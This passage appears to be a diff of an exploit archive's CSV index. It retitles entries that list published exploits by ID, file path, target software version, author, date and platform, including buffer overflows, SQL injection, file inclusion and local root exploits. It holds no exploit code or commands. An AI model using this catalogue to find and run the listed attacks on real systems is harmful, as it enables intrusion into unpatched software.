File",2003-02-25,http-equiv,windows,remote,0 @@ -19564,14 +19564,14 @@ id,file,description,date,author,platform,type,port 22332,platforms/unix/local/22332.c,"BSD lpr 2000.05.07/0.48/0.72_lpr-ppd 0.72 - Local Buffer Overflow (2)",1998-04-22,CMN,unix,local,0 22333,platforms/windows/dos/22333.pl,"Qualcomm Eudora 5.0/5.1/6.0 Long Attachment Filename Denial of Service (1)",2003-03-05,"Paul Szabo",windows,dos,0 22334,platforms/windows/dos/22334.pl,"Qualcomm Eudora 5.0/5.1/6.0 Long Attachment Filename Denial of Service (2)",2003-03-05,"Paul Szabo",windows,dos,0 -22310,platforms/windows/dos/22310.txt,"Microsoft Office Publisher 2010 Crash PoC",2012-10-28,coolkaveh,windows,dos,0 +22310,platforms/windows/dos/22310.txt,"Microsoft Office Publisher 2010 - Crash PoC",2012-10-28,coolkaveh,windows,dos,0 22331,platforms/unix/local/22331.c,"BSD lpr 2000.05.07/0.48/0.72_lpr-ppd 0.72 - Local Buffer Overflow (1)",1998-04-22,"Niall Smart",unix,local,0 22311,platforms/cgi/remote/22311.txt,"Axis Communications Video Server 2.x - Command.CGI File Creation",2003-02-28,"Martin Eiszner",cgi,remote,0 22312,platforms/cgi/remote/22312.txt,"Apple QuickTime/Darwin Streaming Server 4.1.x - parse_xml.cgi File Disclosure",2003-02-28,"Joe Testa",cgi,remote,0 22313,platforms/unix/remote/22313.c,"Sendmail 8.12.x - Header Processing Buffer Overflow (1)",2003-03-02,"Last Stage of Delirium",unix,remote,0 22314,platforms/unix/remote/22314.c,"Sendmail 8.12.x - Header Processing Buffer Overflow (2)",2003-03-02,bysin,unix,remote,0 -22315,platforms/php/webapps/22315.pl,"Typo3 3.5 b5 HTML Hidden Form Field Information Disclosure Weakness (1)",2003-02-28,"Martin Eiszner",php,webapps,0 -22316,platforms/php/webapps/22316.pl,"Typo3 3.5 b5 HTML Hidden Form Field Information Disclosure Weakness (2)",2003-02-28,"Martin Eiszner",php,webapps,0 +22315,platforms/php/webapps/22315.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (1)",2003-02-28,"Martin Eiszner",php,webapps,0 +22316,platforms/php/webapps/22316.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (2)",2003-02-28,"Martin Eiszner",php,webapps,0 22317,platforms/php/webapps/22317.txt,"GTCatalog 0.8.16/0.9 - Remote File Inclusion",2003-03-03,frog,php,webapps,0 22318,platforms/php/webapps/22318.txt,"Webchat 0.77 Defines.php Remote File Inclusion",2003-03-03,frog,php,webapps,0 22319,platforms/hardware/remote/22319.txt,"HP JetDirect Printer SNMP JetAdmin Device Password Disclosure",2003-03-03,"Sven Pechler",hardware,remote,0 @@ -19584,12 +19584,12 @@ id,file,description,date,author,platform,type,port 22326,platforms/linux/local/22326.c,"File 3.x - Utility Local Memory Allocation",2003-03-06,CrZ,linux,local,0 22327,platforms/multiple/remote/22327.txt,"3Com SuperStack 3 Firewall - Content Filter Bypassing",2003-03-05,bit_logic,multiple,remote,0 22328,platforms/windows/dos/22328.txt,"Dr.Web 4.x - Virus Scanner Folder Name Buffer Overflow",2003-03-05,"Fernandez Madrid",windows,dos,0 -22329,platforms/windows/local/22329.c,"CoffeeCup Software Password Wizard 4.0 HTML Source Password Retrieval",2003-03-03,THR,windows,local,0 +22329,platforms/windows/local/22329.c,"CoffeeCup Software Password Wizard 4.0 - HTML Source Password Retrieval",2003-03-03,THR,windows,local,0 22335,platforms/unix/local/22335.pl,"Tower Toppler 0.99.1 - Display Variable Local Buffer Overflow",2002-03-02,"Knud Erik Hojgaard",unix,local,0 22336,platforms/php/webapps/22336.txt,"PHPPing 0.1 - Remote Command Execution",2003-03-06,"gregory Le Bras",php,webapps,0 22337,platforms/cgi/webapps/22337.txt,"Wordit Logbook 098b3 Logbook.pl Remote Command Execution",2003-03-07,"Aleksey Sintsov",cgi,webapps,0 22338,platforms/windows/remote/22338.txt,"Clearswift MailSweeper 4.x - Malformed MIME Attachment Filter Bypass",2003-03-07,http-equiv,windows,remote,0 -22339,platforms/php/webapps/22339.txt,"SimpleBBS 1.0.6 Users.php Insecure File Permissions",2003-03-07,flur,php,webapps,0 +22339,platforms/php/webapps/22339.txt,"SimpleBBS 1.0.6 - Users.php Insecure File Permissions",2003-03-07,flur,php,webapps,0 22340,platforms/linux/local/22340.txt,"MySQL 3.23.x - mysqld Privilege Escalation",2003-03-08,bugsman@libero.it,linux,local,0 22341,platforms/windows/remote/22341.txt,"Opera 6.0/7.0 Long Filename Download Buffer Overrun",2003-03-10,nesumin,windows,remote,0 22342,platforms/linux/remote/22342.c,"Qpopper 4.0.x - Remote Memory Corruption",2003-03-10,"Florian Heinz",linux,remote,0 @@ -19602,7 +19602,7 @@ id,file,description,date,author,platform,type,port 22349,platforms/php/webapps/22349.txt,"PHP-Nuke Splatt Forum 3.2 Module - Path Disclosure",2003-03-12,"Rynho Zeros Web",php,webapps,0 22350,platforms/hardware/remote/22350.txt,"Nokia SGSN DX200 - Remote SNMP Information Disclosure",2003-03-13,"Ollie Whitehouse",hardware,remote,0 22351,platforms/windows/remote/22351.py,"Freefloat FTP Server PUT Command Buffer Overflow",2012-10-30,"Jacob Holcomb",windows,remote,0 -22352,platforms/linux/dos/22352.txt,"TCPDump 3.6/3.7 Malformed RADIUS Packet Denial of Service",2003-03-14,"Bill Ralph",linux,dos,0 +22352,platforms/linux/dos/22352.txt,"TCPDump 3.6/3.7 - Malformed RADIUS Packet Denial of Service",2003-03-14,"Bill Ralph",linux,dos,0 22353,platforms/linux/remote/22353.c,"BitchX 1.0 - Remote Send_CTCP() Memory Corruption",2003-03-06,eSDee,linux,remote,0 22354,platforms/windows/local/22354.c,"Microsoft Windows 2000 Help Facility .CNT File :Link Buffer Overflow",2003-03-09,s0h,windows,local,0 22355,platforms/cgi/remote/22355.txt,"Thunderstone TEXIS 3.0 - 'texis.exe' Information Disclosure",2003-03-14,sir.mordred@hushmail.com,cgi,remote,0 @@ -19611,7 +19611,7 @@ id,file,description,date,author,platform,type,port 22358,platforms/multiple/dos/22358.cfm,"Sun JDK/SDK 1.3/1.4_IBM JDK 1.3.1_BEA Systems WebLogic 5/6/7 java.util.zip Null Value Denial of Service (1)",2003-03-15,"Marc Schoenefeld",multiple,dos,0 22359,platforms/multiple/dos/22359.xsl,"Sun JDK/SDK 1.3/1.4_IBM JDK 1.3.1_BEA Systems WebLogic 5/6/7 java.util.zip Null Value Denial of Service (2)",2003-03-15,"Marc Schoenefeld",multiple,dos,0 22360,platforms/multiple/dos/22360.java,"Sun JDK/SDK 1.3/1.4_IBM JDK 1.3.1_BEA Systems WebLogic 5/6/7 java.util.zip Null Value Denial of Service (3)",2003-03-15,"Marc Schoenefeld",multiple,dos,0 -22361,platforms/linux/remote/22361.cpp,"Qpopper 3/4 Username Information Disclosure Weakness",2003-03-11,plasmahh,linux,remote,0 +22361,platforms/linux/remote/22361.cpp,"Qpopper 3/4 - Username Information Disclosure Weakness",2003-03-11,plasmahh,linux,remote,0 22362,platforms/linux/local/22362.c,"Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Local Root Exploit (1)",2003-03-17,anszom@v-lo.krakow.pl,linux,local,0 22363,platforms/linux/local/22363.c,"Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Local Root Exploit (2)",2003-04-10,"Wojciech Purczynski",linux,local,0 22364,platforms/cgi/webapps/22364.c,"Outblaze Webmail - Cookie Authentication Bypass",2003-03-17,"dong-h0un U",cgi,webapps,0 @@ -19626,12 +19626,12 @@ id,file,description,date,author,platform,type,port 22373,platforms/php/webapps/22373.txt,"PG Dating Pro 1.0 CMS - Multiple Vulnerabilities",2012-10-31,Vulnerability-Lab,php,webapps,0 22374,platforms/php/webapps/22374.txt,"WordPress Plugin foxypress 0.4.2.5 - Multiple Vulnerabilities",2012-10-31,waraxe,php,webapps,0 22375,platforms/windows/remote/22375.rb,"Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow",2012-11-01,Metasploit,windows,remote,0 -22376,platforms/linux/local/22376.txt,"GNOME Eye Of Gnome 1.0.x/1.1.x/2.2 Format String",2003-03-28,"Core Security",linux,local,0 +22376,platforms/linux/local/22376.txt,"GNOME Eye Of Gnome 1.0.x/1.1.x/2.2 - Format String",2003-03-28,"Core Security",linux,local,0 22377,platforms/cgi/webapps/22377.txt,"Kebi Academy 2001 Input Validation",2003-03-17,"dong-h0un U",cgi,webapps,0 -22378,platforms/php/webapps/22378.txt,"MyAbraCadaWeb 1.0 Path Disclosure",2003-03-17,"gregory Le Bras",php,webapps,0 +22378,platforms/php/webapps/22378.txt,"MyAbraCadaWeb 1.0 - Path Disclosure",2003-03-17,"gregory Le Bras",php,webapps,0 22379,platforms/linux/remote/22379.c,"PXE Server 2.0 - Remote Buffer Overrun",2003-03-13,CrZ,linux,remote,0 22380,platforms/cgi/webapps/22380.pl,"Smart Search 4.25 - Remote Command Execution",2003-01-05,knight420,cgi,webapps,0 -22381,platforms/multiple/remote/22381.txt,"SIPS 0.2.2 User Information Disclosure",2003-03-18,dwcgr0up,multiple,remote,0 +22381,platforms/multiple/remote/22381.txt,"SIPS 0.2.2 - User Information Disclosure",2003-03-18,dwcgr0up,multiple,remote,0 22382,platforms/php/webapps/22382.txt,"Mambo Site Server 4.0.10 - index.php Cross-Site Scripting",2003-03-18,"Ertan Kurt",php,webapps,0 22383,platforms/php/webapps/22383.txt,"Basit 1.0 Submit Module Cross-Site Scripting",2003-03-19,"Ertan Kurt",php,webapps,0 22384,platforms/php/webapps/22384.txt,"Siteframe 2.2.4 - search.php Cross-Site Scripting",2003-03-19,"Ertan Kurt",php,webapps,0 @@ -19641,7 +19641,7 @@ id,file,description,date,author,platform,type,port 22388,platforms/multiple/remote/22388.txt,"WFChat 1.0 Information Disclosure",2003-03-19,subj,multiple,remote,0 22389,platforms/php/webapps/22389.txt,"XOOPS 2.0 XoopsOption Information Disclosure",2003-03-20,"gregory Le Bras",php,webapps,0 22390,platforms/windows/dos/22390.c,"Microsoft ActiveSync 3.5 Null Pointer Dereference Denial of Service",2003-03-20,"Andy Davis",windows,dos,0 -22391,platforms/php/webapps/22391.txt,"OSCommerce 2.1/2.2 Error_Message Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps,0 +22391,platforms/php/webapps/22391.txt,"OSCommerce 2.1/2.2 - Error_Message Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps,0 22392,platforms/php/webapps/22392.txt,"OSCommerce 2.1/2.2 Info_Message Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps,0 22393,platforms/php/webapps/22393.txt,"OSCommerce 2.1/2.2 Checkout_Payment.php Error Output Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps,0 22394,platforms/hardware/remote/22394.txt,"Check Point FW-1 Syslog Daemon Unfiltered Escape Sequence",2003-03-21,"Dr. Peter Bieringer",hardware,remote,0 @@ -19654,22 +19654,22 @@ id,file,description,date,author,platform,type,port 22402,platforms/windows/dos/22402.txt,"RealPlayer 15.0.6.14(.3g2) - WriteAV Crash PoC",2012-11-01,coolkaveh,windows,dos,0 22403,platforms/php/webapps/22403.txt,"Joomla Spider Catalog - (index.php product_id parameter) SQL Injection",2012-11-01,D4NB4R,php,webapps,0 22405,platforms/php/webapps/22405.txt,"MyBB Follower User Plugin - SQL Injection",2012-11-01,Zixem,php,webapps,0 -22406,platforms/linux/dos/22406.txt,"Konqueror 4.7.3 Memory Corruption",2012-11-01,"Tim Brown",linux,dos,0 +22406,platforms/linux/dos/22406.txt,"Konqueror 4.7.3 - Memory Corruption",2012-11-01,"Tim Brown",linux,dos,0 22407,platforms/hardware/dos/22407.txt,"Netgear 1.x - ProSafe VPN Firewall Web Interface Login Denial of Service",2003-03-21,"Paul Kurczaba",hardware,dos,0 22408,platforms/cgi/webapps/22408.txt,"Planetmoon Guestbook Clear Text Password Retrieval",2003-03-21,subj,cgi,webapps,0 22409,platforms/multiple/remote/22409.txt,"Simple Chat 1.x - User Information Disclosure",2003-03-21,subj,multiple,remote,0 22410,platforms/multiple/remote/22410.pl,"ProtWare HTML Guardian 6.x - Encryption Weakness",2003-03-21,rain_song,multiple,remote,0 -22411,platforms/php/webapps/22411.txt,"PHP-Nuke 5.6/6.x Banners.php Banner Manager - Password Disclosure",2003-03-22,frog,php,webapps,0 +22411,platforms/php/webapps/22411.txt,"PHP-Nuke 5.6/6.x - Banners.php Banner Manager Password Disclosure",2003-03-22,frog,php,webapps,0 22412,platforms/php/webapps/22412.txt,"Advanced Poll 2.0 - Remote Information Disclosure",2003-03-22,subj,php,webapps,0 22413,platforms/php/webapps/22413.txt,"PHP-Nuke 5.6/6.x News Module - Article.php SQL Injection",2003-03-22,frog,php,webapps,0 22414,platforms/php/webapps/22414.php,"PHP-Nuke 5.6/6.x News Module - Index.php SQL Injection",2003-03-23,frog,php,webapps,0 22415,platforms/hardware/dos/22415.c,"3Com SuperStack II RAS 1500 - IP Header Denial of Service",2003-03-24,"Piotr Chytla",hardware,dos,0 -22416,platforms/hardware/remote/22416.txt,"3Com SuperStack II RAS 1500 Unauthorized Access",2003-03-24,"Piotr Chytla",hardware,remote,0 +22416,platforms/hardware/remote/22416.txt,"3Com SuperStack II RAS 1500 - Unauthorized Access",2003-03-24,"Piotr Chytla",hardware,remote,0 22417,platforms/windows/dos/22417.py,"Kerio Personal Firewall 2.1.x - Remote Authentication Packet Buffer Overflow (1)",2003-04-28,"Core Security",windows,dos,0 22418,platforms/windows/remote/22418.c,"Kerio Personal Firewall 2.1.x - Remote Authentication Packet Buffer Overflow (2)",2003-04-30,ThreaT,windows,remote,0 22419,platforms/php/dos/22419.php,"PHP 4.3 socket_iovec_alloc() Integer Overflow",2003-03-25,"Sir Mordred",php,dos,0 22420,platforms/windows/dos/22420.txt,"Emule 0.27 b Empty Nickname Chat Request Denial of Service",2003-03-25,"Auriemma Luigi",windows,dos,0 -22421,platforms/php/webapps/22421.txt,"Web Chat Manager 2.0 HTML Code Injection",2003-03-25,Over_G,php,webapps,0 +22421,platforms/php/webapps/22421.txt,"Web Chat Manager 2.0 - HTML Code Injection",2003-03-25,Over_G,php,webapps,0 22422,platforms/php/webapps/22422.txt,"PHP-Nuke 6.5 Addon Viewpage.php File Disclosure",2003-03-25,"Zero-X www.lobnan.de Team",php,webapps,0 22423,platforms/php/webapps/22423.txt,"PHP-Nuke 6.0/6.5 Forum Module - Viewtopic.php SQL Injection",2003-03-25,frog,php,webapps,0 22424,platforms/php/webapps/22424.txt,"PHP-Nuke 6.0/6.5 Forum Module - Viewforum.php SQL Injection",2003-03-25,frog,php,webapps,0 @@ -19678,7 +19678,7 @@ id,file,description,date,author,platform,type,port 22427,platforms/php/webapps/22427.txt,"WordPress All Video Gallery 1.1 Plugin - SQL Injection",2012-11-02,"Ashiyane Digital Security Team",php,webapps,0 22521,platforms/php/webapps/22521.c,"XMB Forum 1.8 Member.php SQL Injection",2003-04-22,zeez@bbugs.org,php,webapps,0 22429,platforms/php/webapps/22429.txt,"vBulletin ChangUonDyU Advanced Statistics - SQL Injection",2012-11-02,Juno_okyo,php,webapps,0 -22430,platforms/php/webapps/22430.txt,"PrestaShop 1.5.1 Persistent XSS",2012-11-02,"David Sopas",php,webapps,0 +22430,platforms/php/webapps/22430.txt,"PrestaShop 1.5.1 - Persistent XSS",2012-11-02,"David Sopas",php,webapps,0 22431,platforms/php/webapps/22431.txt,"achievo 1.4.5 - Multiple Vulnerabilities (1)",2012-11-02,"Canberk BOLAT",php,webapps,0 22432,platforms/windows/remote/22432.rb,"HP Intelligent Management Center UAM Buffer Overflow",2012-11-04,Metasploit,windows,remote,0 22433,platforms/linux/dos/22433.pl,"Monkey HTTP Daemon 0.4/0.5/0.6 Excessive POST Data Buffer Overflow",2003-03-24,"Matthew Murphy",linux,dos,0 @@ -19691,9 +19691,9 @@ id,file,description,date,author,platform,type,port 22440,platforms/hardware/dos/22440.c,"D-Link DI-614+ IP Fragment Reassembly Denial of Service",1998-04-16,humble,hardware,dos,0 22441,platforms/multiple/dos/22441.txt,"Mozilla 1.x_Opera 7.0 LiveConnect JavaScript Denial of Service",2003-03-28,"Marc Schoenefeld",multiple,dos,0 22442,platforms/unix/remote/22442.c,"SendMail 8.11.6 - Address Prescan Memory Corruption",2003-03-29,sorbo,unix,remote,0 -22443,platforms/php/webapps/22443.txt,"Beanwebb Guestbook 1.0 Unauthorized Administrative Access",2003-03-29,euronymous,php,webapps,0 -22444,platforms/php/webapps/22444.txt,"Justice Guestbook 1.3 Path Disclosure",2003-03-29,euronymous,php,webapps,0 -22445,platforms/php/webapps/22445.txt,"ScozBook 1.1 Path Disclosure",2003-03-29,euronymous,php,webapps,0 +22443,platforms/php/webapps/22443.txt,"Beanwebb Guestbook 1.0 - Unauthorized Administrative Access",2003-03-29,euronymous,php,webapps,0 +22444,platforms/php/webapps/22444.txt,"Justice Guestbook 1.3 - Path Disclosure",2003-03-29,euronymous,php,webapps,0 +22445,platforms/php/webapps/22445.txt,"ScozBook 1.1 - Path Disclosure",2003-03-29,euronymous,php,webapps,0 22446,platforms/linux/dos/22446.txt,"EZ Server 1.0 Long Argument Local Denial of Service",2003-03-31,"gregory Le Bras",linux,dos,0 22447,platforms/windows/dos/22447.txt,"HP Instant TopTools 5.0 - Remote Denial of Service",2003-03-31,"Erik Parker",windows,dos,0 22448,platforms/windows/remote/22448.txt,"BEA WebLogic 7.0 Hostname/NetBIOS Name Remote Information Disclosure",2003-04-02,"Michael Hendrickx",windows,remote,0 @@ -19708,7 +19708,7 @@ id,file,description,date,author,platform,type,port 22457,platforms/php/webapps/22457.txt,"PHPSysInfo 2.0/2.1 - Index.php File Disclosure",2003-04-03,"Albert Puigsech Galicia",php,webapps,0 22458,platforms/linux/local/22458.c,"Linux Kernel 2.2.x / 2.4.x - I/O System Call File Existence Weakness",2003-04-04,"Andrew Griffiths",linux,local,0 22459,platforms/php/webapps/22459.txt,"PHPSysInfo 2.0/2.1 - Index.php LNG File Disclosure",2003-04-04,"Albert Puigsech Galicia",php,webapps,0 -22460,platforms/windows/dos/22460.txt,"Abyss Web Server 1.1.2 Incomplete HTTP Request Denial of Service",2003-04-05,"Auriemma Luigi",windows,dos,0 +22460,platforms/windows/dos/22460.txt,"Abyss Web Server 1.1.2 - Incomplete HTTP Request Denial of Service",2003-04-05,"Auriemma Luigi",windows,dos,0 22461,platforms/php/webapps/22461.txt,"Invision Board 1.1.1 functions.php SQL Injection",2003-04-05,"Gossi The Dog",php,webapps,0 22462,platforms/multiple/remote/22462.txt,"Interbase 6.x - External Table File Verification",2003-04-05,"Kotala Zdenek",multiple,remote,0 22463,platforms/php/webapps/22463.txt,"WordPress Spider Catalog 1.1 Plugin - HTML Code Injection / Cross-Site scripting",2012-11-04,D4NB4R,php,webapps,0 @@ -19764,7 +19764,7 @@ id,file,description,date,author,platform,type,port 22515,platforms/windows/remote/22515.txt,"AN HTTPD 1.x - Count.pl Directory Traversal",2003-04-22,"Matthew Murphy",windows,remote,0 22516,platforms/windows/dos/22516.pl,"Xeneo Web Server 2.2.9 - Denial of Service",2003-04-21,badpack3t,windows,dos,0 22517,platforms/php/webapps/22517.txt,"OpenBB 1.0/1.1 - Index.php SQL Injection",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 -22518,platforms/windows/dos/22518.html,"Microsoft Shlwapi.dll 6.0.2800.1106 Malformed HTML Form Tag DoS",2003-04-22,"Ramon Pinuaga Cascales",windows,dos,0 +22518,platforms/windows/dos/22518.html,"Microsoft Shlwapi.dll 6.0.2800.1106 - Malformed HTML Form Tag DoS",2003-04-22,"Ramon Pinuaga Cascales",windows,dos,0 22519,platforms/php/webapps/22519.txt,"OpenBB 1.0/1.1 Board.php SQL Injection",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 22520,platforms/php/webapps/22520.txt,"OpenBB 1.0/1.1 Member.php SQL Injection",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 22522,platforms/multiple/remote/22522.pl,"Web Protector 2.0 Trivial Encryption Weakness",2003-04-22,rjfix,multiple,remote,0 @@ -19780,13 +19780,13 @@ id,file,description,date,author,platform,type,port 22531,platforms/linux/local/22531.pl,"SAP Database 7.3/7.4 SDBINST Race Condition",2003-04-23,"Larry W. Cashdollar",linux,local,0 22532,platforms/hardware/remote/22532.txt,"IKE Aggressive Mode Shared Secret Hash Leakage Weakness",1999-10-02,"John Pliam",hardware,remote,0 22533,platforms/hardware/remote/22533.txt,"Nokia IPSO 3.4.x - Voyager ReadFile.TCL Remote File Reading",2003-04-24,"Jonas Eriksson",hardware,remote,0 -22534,platforms/php/webapps/22534.txt,"Truegalerie 1.0 Unauthorized Administrative Access",2003-04-25,frog,php,webapps,0 +22534,platforms/php/webapps/22534.txt,"Truegalerie 1.0 - Unauthorized Administrative Access",2003-04-25,frog,php,webapps,0 22535,platforms/multiple/dos/22535.txt,"VisNetic ActiveDefense 1.3.1 - Multiple GET Request Denial of Service",2003-04-24,"Positive Technologies",multiple,dos,0 22536,platforms/multiple/dos/22536.txt,"Opera 7.10 Permanent Denial of Service",2003-04-24,"David F. Madrid",multiple,dos,0 22537,platforms/linux/dos/22537.c,"Libopt.a 3.1x Error Logging Buffer Overflow (1)",2003-04-24,kf,linux,dos,0 22538,platforms/linux/local/22538.pl,"Libopt.a 3.1x Error Logging Buffer Overflow (2)",2003-04-24,jlanthea,linux,local,0 22539,platforms/php/webapps/22539.txt,"Xoops 1.3.x/2.0 MyTextSanitizer HTML Injection",2003-04-25,magistrat,php,webapps,0 -22540,platforms/linux/local/22540.c,"Linux-ATM LES 2.4 Command Line Argument Buffer Overflow",2003-02-18,"Angelo Rosiello",linux,local,0 +22540,platforms/linux/local/22540.c,"Linux-ATM LES 2.4 - Command Line Argument Buffer Overflow",2003-02-18,"Angelo Rosiello",linux,local,0 22541,platforms/cgi/remote/22541.txt,"Alt-N WebAdmin 2.0.x - Remote File Viewing",2003-04-25,david@kamborio.net,cgi,remote,0 22542,platforms/cgi/remote/22542.txt,"Alt-N WebAdmin 2.0.x - Remote File Disclosure",2003-04-25,david@kamborio.net,cgi,remote,0 22543,platforms/php/webapps/22543.txt,"Onecenter Forum 4.0 IMG Tag Script Injection",2003-04-25,"David F. Madrid",php,webapps,0 @@ -19806,11 +19806,11 @@ id,file,description,date,author,platform,type,port 22557,platforms/php/webapps/22557.txt,"PHP-Nuke Splatt Forum 4.0 Module - Cross-Site Scripting",2003-05-01,"Morning Wood",php,webapps,0 22558,platforms/php/webapps/22558.txt,"PHP-Nuke Splatt Forum 4.0 Module - HTML Injection",2003-05-01,"Morning Wood",php,webapps,0 22559,platforms/cgi/webapps/22559.pl,"Stockman Shopping Cart 7.8 - Arbitrary Command Execution",2003-05-01,"Aleksey Sintsov",cgi,webapps,0 -22560,platforms/linux/dos/22560.txt,"KDE Konqueror 3.0.3 Malformed HTML Page Denial of Service",2003-05-02,Joachim_Strombergson,linux,dos,0 +22560,platforms/linux/dos/22560.txt,"KDE Konqueror 3.0.3 - Malformed HTML Page Denial of Service",2003-05-02,Joachim_Strombergson,linux,dos,0 22561,platforms/hp-ux/dos/22561.txt,"HP-UX 11 RWrite Buffer Overflow",2003-05-02,bt@delfi.lt,hp-ux,dos,0 -22562,platforms/windows/remote/22562.pl,"Microsoft IIS 5 User Existence Disclosure (1)",1999-02-24,JeiAr,windows,remote,0 -22563,platforms/windows/remote/22563.pl,"Microsoft IIS 5 User Existence Disclosure (2)",1999-02-24,JeiAr,windows,remote,0 -22564,platforms/windows/local/22564.c,"FlashFXP 1.4 User Password Encryption Weakness",2003-05-05,DVDMAN,windows,local,0 +22562,platforms/windows/remote/22562.pl,"Microsoft IIS 5 - User Existence Disclosure (1)",1999-02-24,JeiAr,windows,remote,0 +22563,platforms/windows/remote/22563.pl,"Microsoft IIS 5 - User Existence Disclosure (2)",1999-02-24,JeiAr,windows,remote,0 +22564,platforms/windows/local/22564.c,"FlashFXP 1.4 - User Password Encryption Weakness",2003-05-05,DVDMAN,windows,local,0 22565,platforms/linux/local/22565.c,"MySQL 3.x/4.0.x - Weak Password Encryption",2003-05-05,"Secret Squirrel",linux,local,0 22566,platforms/freebsd/local/22566.pl,"Youbin 2.5/3.0/3.4 HOME Buffer Overflow",2003-05-06,"Knud Erik Hojgaard",freebsd,local,0 22567,platforms/linux/local/22567.c,"Leksbot 1.2 - Multiple Unspecified Vulnerabilities",2003-05-06,gunzip,linux,local,0 @@ -19827,11 +19827,11 @@ id,file,description,date,author,platform,type,port 22580,platforms/freebsd/local/22580.c,"Firebird 1.0 GDS_Inet_Server Interbase Environment Variable Buffer Overflow",2003-05-10,bob,freebsd,local,0 22581,platforms/windows/dos/22581.pl,"Youngzsoft CMailServer 4.0 MAIL FROM Buffer Overflow",2003-05-10,"Dennis Rand",windows,dos,0 22582,platforms/windows/dos/22582.pl,"Youngzsoft CMailServer 4.0 RCPT TO Buffer Overflow",2003-05-10,"Dennis Rand",windows,dos,0 -22583,platforms/asp/webapps/22583.pl,"Snitz Forums 2000 Register.ASP SQL Injection",2003-05-10,sharpiemarker,asp,webapps,0 +22583,platforms/asp/webapps/22583.pl,"Snitz Forums 2000 - Register.ASP SQL Injection",2003-05-10,sharpiemarker,asp,webapps,0 22584,platforms/linux/remote/22584.txt,"Info-ZIP UnZip 5.50 Encoded Character Hostile Destination Path",2003-05-10,Jelmer,linux,remote,0 22585,platforms/windows/dos/22585.pl,"EType EServ 2.98/2.99/3.0 Resource Exhaustion Denial of Service (1)",2003-05-11,"Matthew Murphy",windows,dos,0 22586,platforms/windows/dos/22586.c,"EType EServ 2.98/2.99/3.0 Resource Exhaustion Denial of Service (2)",2003-05-11,rash,windows,dos,0 -22587,platforms/windows/dos/22587.c,"Pi3Web 2.0.1 Malformed GET Request Denial of Service",2003-04-26,"Angelo Rosiello",windows,dos,0 +22587,platforms/windows/dos/22587.c,"Pi3Web 2.0.1 - Malformed GET Request Denial of Service",2003-04-26,"Angelo Rosiello",windows,dos,0 22588,platforms/cgi/webapps/22588.txt,"Happymall E-Commerce Software 4.3/4.4 Normal_HTML.CGI Cross-Site Scripting",2003-05-12,"Julio Cesar",cgi,webapps,0 22589,platforms/php/webapps/22589.txt,"PHP-Nuke 5.x/6.x Web_Links Module - SQL Injection",2003-05-12,"Albert Puigsech Galicia",php,webapps,0 22590,platforms/php/webapps/22590.txt,"netOffice Dwins 1.4p3 - SQL Injection",2012-11-09,dun,php,webapps,0 @@ -19852,7 +19852,7 @@ id,file,description,date,author,platform,type,port 22605,platforms/php/webapps/22605.txt,"OneOrZero Helpdesk 1.4 TUpdate.php SQL Injection",2003-05-15,frog,php,webapps,0 22606,platforms/php/webapps/22606.py,"OneOrZero Helpdesk 1.4 Install.php Administrative Access",2003-05-15,frog,php,webapps,0 22607,platforms/php/webapps/22607.txt,"EZ Publish 2.2 - Index.php IMG Tag Cross-Site Scripting",2003-05-16,"Ferruh Mavituna",php,webapps,0 -22608,platforms/windows/dos/22608.txt,"Snowblind Web Server 1.0/1.1 Malformed HTTP Request Denial of Service",2003-05-16,euronymous,windows,dos,0 +22608,platforms/windows/dos/22608.txt,"Snowblind Web Server 1.0/1.1 - Malformed HTTP Request Denial of Service",2003-05-16,euronymous,windows,dos,0 22609,platforms/windows/remote/22609.txt,"Snowblind 1.0/1.1 Web Server File Disclosure",2003-05-16,euronymous,windows,remote,0 22610,platforms/windows/dos/22610.txt,"Snowblind Web Server 1.0/1.1 HTTP GET Request Buffer Overflow",2003-05-16,euronymous,windows,dos,0 22611,platforms/multiple/remote/22611.txt,"Netscape Enterprise Server 3.x/4.x - PageServices Information Disclosure",1998-08-16,anonymous,multiple,remote,0 @@ -19879,37 +19879,37 @@ id,file,description,date,author,platform,type,port 22632,platforms/php/webapps/22632.txt,"XMB Forum 1.8 Member.php Cross-Site Scripting",2003-06-22,"Marc Ruef",php,webapps,0 22633,platforms/linux/local/22633.c,"Polymorph 0.4 - Filename Buffer Overflow",2003-05-22,demz,linux,local,0 22634,platforms/multiple/dos/22634.txt,"Nessus 2.0.x - LibNASL Arbitrary Code Execution",2003-05-22,"Sir Mordred",multiple,dos,0 -22635,platforms/windows/remote/22635.c,"Magic Winmail Server 2.3 USER POP3 Command Format String",2003-05-23,D4rkGr3y,windows,remote,0 +22635,platforms/windows/remote/22635.c,"Magic Winmail Server 2.3 USER POP3 - Command Format String",2003-05-23,D4rkGr3y,windows,remote,0 22636,platforms/windows/remote/22636.txt,"EServ 2.9x - Directory Indexing",2003-05-23,D4rkGr3y,windows,remote,0 22637,platforms/windows/dos/22637.pl,"Prishtina FTP Client 1.x - Remote Denial of Service",2003-05-23,DHGROUP,windows,dos,0 22638,platforms/irix/dos/22638.txt,"IRIX 5.x/6.x - MediaMail HOME Environment Variable Buffer Overflow",2003-05-23,bazarr@ziplip.com,irix,dos,0 22639,platforms/asp/webapps/22639.txt,"IISProtect 2.1/2.2 Web Administration Interface SQL Injection",2003-05-23,Gyrniff,asp,webapps,0 22640,platforms/linux/local/22640.c,"UML_NET Integer Mismanagement Code Execution",2003-05-23,ktha@hushmail.com,linux,local,0 22641,platforms/php/webapps/22641.txt,"BLNews 2.1.3 - Remote File Inclusion",2003-05-24,Over_G,php,webapps,0 -22642,platforms/php/webapps/22642.txt,"Ultimate PHP Board 1.9 admin_iplog.php Arbitrary PHP Execution",2003-05-24,euronymous,php,webapps,0 +22642,platforms/php/webapps/22642.txt,"Ultimate PHP Board 1.9 - admin_iplog.php Arbitrary PHP Execution",2003-05-24,euronymous,php,webapps,0 22643,platforms/linux/local/22643.pl,"Ifenslave 0.0.7 - Argument Local Buffer Overflow 